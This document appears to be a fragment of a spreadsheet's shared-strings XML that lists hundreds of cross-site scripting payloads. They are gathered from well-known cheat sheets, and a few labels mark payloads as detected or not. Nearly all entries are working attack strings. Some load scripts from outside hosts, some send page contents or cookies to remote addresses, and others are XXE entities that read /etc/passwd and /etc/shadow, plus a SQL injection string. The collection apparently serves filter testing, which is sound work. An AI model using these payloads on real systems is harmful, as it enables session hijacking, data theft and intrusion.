    <t>&lt;;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I&gt;;&lt;;/XML&gt;;</t>
  </si>
  <si>
    <t>&lt;;HTML&gt;;&lt;;BODY&gt;;</t>
  </si>
  <si>
    <t>&lt;;!--[if gte IE 4]&gt;;</t>
  </si>
  <si>
    <t>&lt;;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=&lt;;SCRIPT&gt;;alert(';XSS';)&lt;;/SCRIPT&gt;;";&gt;;</t>
  </si>
  <si>
    <t>&lt;;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;!--#exec cmd=";/bin/echo ';&lt;;SCRIPT SRC';";--&gt;;&lt;;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js&gt;;&lt;;/SCRIPT&gt;;';";--&gt;;</t>
  </si>
  <si>
    <t>&lt;;? echo(';&lt;;SCR)';;</t>
  </si>
  <si>
    <t>&lt;;BR SIZE=";&amp;;{alert(';XSS';)}";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=JaVaScRiPt:alert(';XSS';)&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=javascript:alert(&amp;;quot;XSS&amp;;quot;)&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG RC=&amp;;#106;&amp;;#97;&amp;;#118;&amp;;#97;&amp;;#115;&amp;;#99;&amp;;#114;&amp;;#105;&amp;;#112;&amp;;#116;&amp;;#58;&amp;;#97;&amp;;#108;&amp;;#101;&amp;;#114;&amp;;#116;&amp;;#40;&amp;;#39;&amp;;#88;&amp;;#83;&amp;;#83;&amp;;#39;&amp;;#41;&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG RC=&amp;;#0000106&amp;;#0000097&amp;;#0000118&amp;;#0000097&amp;;#0000115&amp;;#0000099&amp;;#0000114&amp;;#0000105&amp;;#0000112&amp;;#0000116&amp;;#0000058&amp;;#0000097&amp;;#0000108&amp;;#0000101&amp;;#0000114&amp;;#0000116&amp;;#0000040&amp;;#0000039&amp;;#0000088&amp;;#0000083&amp;;#0000083&amp;;#0000039&amp;;#0000041&gt;;</t>
  </si>
  <si>
    <t>&lt;;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=&amp;;#x6A&amp;;#x61&amp;;#x76&amp;;#x61&amp;;#x73&amp;;#x63&amp;;#x72&amp;;#x69&amp;;#x70&amp;;#x74&amp;;#x3A&amp;;#x61&amp;;#x6C&amp;;#x65&amp;;#x72&amp;;#x74&amp;;#x28&amp;;#x27&amp;;#x58&amp;;#x53&amp;;#x53&amp;;#x27&amp;;#x29&gt;;</t>
  </si>
  <si>
    <t>&lt;;HEAD&gt;;&lt;;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";&gt;; &lt;;/HEAD&gt;;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-</t>
  </si>
  <si>
    <t>\";;alert(';XSS';);//</t>
  </si>
  <si>
    <t>&lt;;/TITLE&gt;;&lt;;SCRIPT&gt;;alert("XSS");&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;STYLE&gt;;@im\port';\ja\vasc\ript:alert(";XSS";)';;&lt;;/STYLE&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";jav&amp;#x09;ascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";jav&amp;;#x09;ascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";jav&amp;;#x0A;ascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";jav&amp;;#x0D;ascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG&amp;#x0D;SRC&amp;#x0D;=&amp;#x0D;";&amp;#x0D;j&amp;#x0D;a&amp;#x0D;v&amp;#x0D;a&amp;#x0D;s&amp;#x0D;c&amp;#x0D;r&amp;#x0D;i&amp;#x0D;p&amp;#x0D;t&amp;#x0D;:&amp;#x0D;a&amp;#x0D;l&amp;#x0D;e&amp;#x0D;r&amp;#x0D;t&amp;#x0D;&amp;#x0D;';&amp;#x0D;X&amp;#x0D;S&amp;#x0D;S&amp;#x0D;';&amp;#x0D;)&amp;#x0D;";&amp;#x0D;&gt;;&amp;#x0D;</t>
  </si>
  <si>
    <t>perl -e ';print ";&lt;;IM SRC=java\0script:alert(";XSS";)&gt;";;';&gt;; out</t>
  </si>
  <si>
    <t>perl -e ';print ";&amp;;&lt;;SCR\0IPT&gt;;alert(";XSS";)&lt;;/SCR\0IPT&gt;;";;'; &gt;; out</t>
  </si>
  <si>
    <t>&lt;;IMG SRC="; &amp;;#14;  javascript:alert(';XSS';);";&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js</t>
  </si>
  <si>
    <t>&lt;;SCRIPT SRC=//ha.ckers.org/.j&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG SRC=";javascript:alert(';XSS';)";</t>
  </si>
  <si>
    <t>&lt;;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;;</t>
  </si>
  <si>
    <t>&lt;;&lt;;SCRIPT&gt;;alert(";XSS";);//&lt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;IMG ";";";&gt;;&lt;;SCRIPT&gt;;alert(";XSS";)&lt;;/SCRIPT&gt;;";&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT&gt;;a=/XSS/</t>
  </si>
  <si>
    <t>&lt;;SCRIPT a=";&gt;;"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT ";a=';&gt;;';"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT a=`&gt;;` SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT&gt;;document.write(";&lt;;SCRI";);&lt;;/SCRIPT&gt;;PT SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;SCRIPT a=";&gt;';&gt;"; SRC=";http://ha.ckers.org/xss.js";&gt;;&lt;;/SCRIPT&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://66.102.7.147/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://1113982867/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://0x42.0x0000066.0x7.0x93/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://0102.0146.0007.00000223/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";h&amp;#x0A;tt&amp;#09;p://6&amp;;#09;6.000146.0x7.147/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";//www.google.com/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";//google";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://ha.ckers.org@google";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://google:ha.ckers.org";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://google.com/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://www.google.com./";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";javascript:document.location=';http://www.google.com/';";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>&lt;;A HREF=";http://www.gohttp://www.google.com/ogle.com/";&gt;;XSS&lt;;/A&gt;;</t>
  </si>
  <si>
    <t>;&gt;;&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\]^`=alert(;XSS";)&gt;;</t>
  </si>
  <si>
    <t>&lt;;/script&gt;;&lt;;script&gt;;alert(1)&lt;;/script&gt;;</t>
  </si>
  <si>
    <t>&lt;;/br style=a:expression(alert())&gt;;</t>
  </si>
  <si>
    <t>&lt;;scrscriptipt&gt;;alert(1)&lt;;/scrscriptipt&gt;;</t>
  </si>
  <si>
    <t>&lt;;br size=\";&amp;;{alert(&amp;#039;XSS&amp;#039;)}\";&gt;;</t>
  </si>
  <si>
    <t>perl -e &amp;#039;print \";&lt;;IMG SRC=java\0script:alert(\";XSS\";)&gt;;\";;&amp;#039; &gt;; out</t>
  </si>
  <si>
    <t>perl -e &amp;#039;print \";&lt;;SCR\0IPT&gt;;alert(\";XSS\";)&lt;;/SCR\0IPT&gt;;\";;&amp;#039; &gt;; out</t>
  </si>
  <si>
    <t>&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))&gt;XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))&gt;XSS STYLE=xss:e/**/xpression(alert('XSS'))&gt;&lt;/XSS STYLE=xss:expression(alert('XSS'))&gt;&gt;&gt;&lt;script&gt;alert("XSS")&lt;/script&gt;&amp;</t>
  </si>
  <si>
    <t>&gt;&lt;STYLE&gt;@importjavascript:alert('XSS')";&lt;/STYLE&gt;</t>
  </si>
  <si>
    <t>&gt;"'&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;</t>
  </si>
  <si>
    <t>&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;</t>
  </si>
  <si>
    <t>%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'</t>
  </si>
  <si>
    <t>&lt;IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS&lt;WBR&gt;&amp;quot;)&gt;</t>
  </si>
  <si>
    <t>&lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt;</t>
  </si>
  <si>
    <t>&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt;</t>
  </si>
  <si>
    <t>&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0A;ascript:alert(&lt;WBR&gt;'XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="jav&amp;#x0D;ascript:alert(&lt;WBR&gt;'XSS');"&gt;</t>
  </si>
  <si>
    <t>&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('gotcha');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foof&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file://c:/boot.ini"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/shadow"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM "file:///dev/random"&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;alert('XSS')&lt;/script&gt;</t>
  </si>
  <si>
    <t>%3cscript%3ealert('XSS')%3c/script%3e</t>
  </si>
  <si>
    <t>%22%3e%3cscript%3ealert('XSS')%3c/script%3e</t>
  </si>
  <si>
    <t>&gt;&lt;s%2b"cript&gt;alert(document.cookie)&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onstart='javascript:alert('1');'&gt;=(◕_◕)=</t>
  </si>
  <si>
    <t>XSS Payload</t>
  </si>
  <si>
    <t>Encode Form</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onactivate=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onafterscriptexecute=alert(1)&gt;&lt;script&gt;1&lt;/script&gt;</t>
  </si>
  <si>
    <t>Results</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;xss id=x style="position:absolute;" onanimationcancel="print()"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;xss style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>Detected</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>Not Detected</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onbeforedeactivate=print()&gt;&lt;/xss&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforeprint=console.log(1)&gt;</t>
  </si>
  <si>
    <t>&lt;xss onbeforescriptexecute=alert(1)&gt;&lt;script&gt;1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;animate onbegin=alert(1) attributeName=x dur=1s&gt;</t>
  </si>
  <si>
    <t>&lt;xss onfocusout=alert(1) id=x tabindex=1 style=display:block&gt;test&lt;/xss&gt;&lt;input value=clickme&gt;</t>
  </si>
  <si>
    <t>&lt;video onfullscreenchange=alert(1) src=validvideo.mp4 controls&gt;</t>
  </si>
  <si>
    <t>&lt;input oninput=alert(1) value=xss&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;input oninvalid=alert(1) required&gt;&lt;input type=submit&gt;</t>
  </si>
  <si>
    <t>&lt;xss onkeydown="alert(1)" contenteditable style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onkeypress="alert(1)" contenteditable style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onkeyup="alert(1)" contenteditable style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmousedown="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmouseenter="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmouseleave="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmousemove="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmouseout="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmouseover="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmouseup="alert(1)" style=display:block&gt;test&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onmousewheel=alert(1) style=display:block&gt;requires scrolling</t>
  </si>
  <si>
    <t>&lt;video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls&gt;</t>
  </si>
  <si>
    <t>&lt;body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)&gt;</t>
  </si>
  <si>
    <t>&lt;a onpaste="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onpause=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerdown=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerenter=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerleave=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointermove=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerout=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerover=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerrawupdate=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;xss onpointerup=alert(1) style=display:block&gt;XSS&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;form onreset=alert(1)&gt;&lt;input type=reset&gt;</t>
  </si>
  <si>
    <t>&lt;form&gt;&lt;input type=search onsearch=alert(1) value="Hit return" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onseeked=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onseeking=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;input onselect=alert(1) value="XSS" autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;body onselectionchange=alert(1)&gt;select some text</t>
  </si>
  <si>
    <t>&lt;div contextmenu=xss&gt;&lt;p&gt;Right click&lt;menu type=context id=xss onshow=alert(1)&gt;&lt;/menu&gt;&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;form onsubmit=alert(1)&gt;&lt;input type=submit&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body ontouchend=alert(1)&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body ontouchmove=alert(1)&gt; </t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onvolumechange=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;body onwheel=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;noembed&gt;&lt;img title="&lt;/noembed&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;noscript&gt;&lt;img title="&lt;/noscript&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;&lt;img title="&lt;/style&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;iframe&gt;&lt;img title="&lt;/iframe&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;xmp&gt;&lt;img title="&lt;/xmp&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;textarea&gt;&lt;img title="&lt;/textarea&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;noframes&gt;&lt;img title="&lt;/noframes&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;title&gt;&lt;img title="&lt;/title&gt;&lt;img src onerror=alert(1)&gt;"&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;onerror=alert;throw 1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;{onerror=alert}throw 1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;throw onerror=alert,1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;throw onerror=eval,'=alert\x281\x29'&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;location='javascript:alert\x281\x29'&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;script&gt;alert`1`&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;new Function`X${document.location.hash.substr`1`}`&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;Function`X${document.location.hash.substr`1`}```&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;video&gt;&lt;source onerror=location=/\02.rs/+document.cookie&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;svg onload=alert(1) </t>
  </si>
  <si>
    <t>&lt;script&gt;throw[onerror]=[alert],1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;var{haha:onerror=alert}=0;throw 1&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;script&gt;window.name='javascript:alert(1)';&lt;/script&gt;&lt;svg onload=location=name&gt;</t>
  </si>
  <si>
    <t>&lt;!-- Only works as reflected XSS --&gt;
&lt;svg/onload=eval(name)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If you control the URL --&gt;
&lt;svg/onload=eval(`'`+URL)&gt;</t>
  </si>
  <si>
    <t>https://github.com/terjanq/Tiny-XSS-Payloads</t>
  </si>
  <si>
    <t>&lt;!-- If you control the name, but unsafe-eval not enabled --&gt;
&lt;svg/onload=location=name&gt;</t>
  </si>
  <si>
    <t>&lt;!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM --&gt;
&lt;svg&gt;&lt;svg/onload=eval(name)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --&gt;
&lt;audio/src/onerror=eval(name)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM --&gt;
&lt;img/src/onerror=eval(`'`+URL)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- Just a casual script --&gt;
&lt;script/src=//Ǌ.₨&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If you control the name of the window --&gt;
&lt;iframe/onload=src=top.name&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If you control the URL --&gt;
&lt;iframe/onload=eval(`'`+URL)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If number of iframes on the page is constant --&gt;
&lt;iframe/onload=src=top[0].name+/\Ǌ.₨?/&gt;</t>
  </si>
  <si>
    <t>&lt;!-- for Firefox only --&gt;
&lt;iframe/srcdoc="&lt;svg&gt;&lt;script/href=//Ǌ.₨ /&gt;"&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If number of iframes on the page is random --&gt;
&lt;iframe/onload=src=contentWindow.name+/\Ǌ.₨?/&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If inline styles are allowed --&gt;
&lt;style/onload=eval(name)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If inline styles are allowed and the URL can be controlled --&gt;
&lt;style/onload=eval(`'`+URL)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- If inline styles are blocked --&gt;
&lt;style/onerror=eval(name)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- Uses external script as import, doesn't work in innerHTML --&gt;
&lt;!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --&gt;
&lt;svg/onload=import(/\\Ǌ.₨/)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- Uses external script as import,  triggers if inline styles are allowed.
&lt;!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --&gt;
&lt;style/onload=import(/\\Ǌ.₨/)&gt;</t>
  </si>
  <si>
    <t>&lt;!-- Uses external script as import --&gt;
&lt;!-- The PoC only works on https and Chrome, because Ǌ.₨ checks for Sec-Fetch-Dest header --&gt;
&lt;iframe/onload=import(/\\Ǌ.₨/)&gt;</t>
  </si>
  <si>
    <t>&lt;input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e"&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e'&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e&gt;&lt;/input&gt;</t>
  </si>
  <si>
